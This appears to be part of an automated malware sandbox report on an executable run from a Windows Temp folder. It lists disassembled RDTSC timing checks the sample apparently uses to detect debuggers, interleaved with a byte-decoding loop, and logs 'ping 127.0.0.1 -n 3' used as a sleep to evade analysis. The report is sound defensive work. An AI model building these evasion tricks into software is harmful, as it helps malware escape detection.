Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403FD3 second address: 0000000000403FD9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403FFC second address: 0000000000404002 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404029 second address: 000000000040402F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684D71CFAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404109 second address: 000000000040410F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684D71E5Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404137 second address: 000000000040413D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404161 second address: 0000000000404167 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C49h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040417F second address: 0000000000404185 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041A9 second address: 00000000004041AF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C57h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041D6 second address: 00000000004041DC instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041F9 second address: 00000000004041FF instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C54h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404223 second address: 0000000000404229 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404245 second address: 000000000040424B instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040426A second address: 0000000000404270 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C50h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040428F second address: 0000000000404295 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004042B3 second address: 00000000004042B9 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004042D8 second address: 00000000004042DE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C53h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404300 second address: 0000000000404306 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684D71997h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404079 second address: 000000000040407F instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040409B second address: 00000000004040A1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C50h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004040C1 second address: 00000000004040C7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C51h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004040E8 second address: 00000000004040EE instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684D71C4Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040434E second address: 0000000000404354 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, eax 0x00000004 xor eax, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403BDA second address: 0000000000403BFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b push 00000005h 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C02 second address: 0000000000403C23 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, 00403F45h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C29 second address: 0000000000403C43 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b push eax 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C49 second address: 0000000000403C6C instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b push 000013C5h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C72 second address: 0000000000403C92 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b push 00404779h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403C98 second address: 0000000000403CB7 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Dh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ebx, 00403FA9h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC92Ah 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007FA684CECA8Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC879h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC887h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC884h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC883h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007FA684CEC5C7h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC880h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC881h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	RDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007FA684CEC87Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc

Uses ping.exe to sleep

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
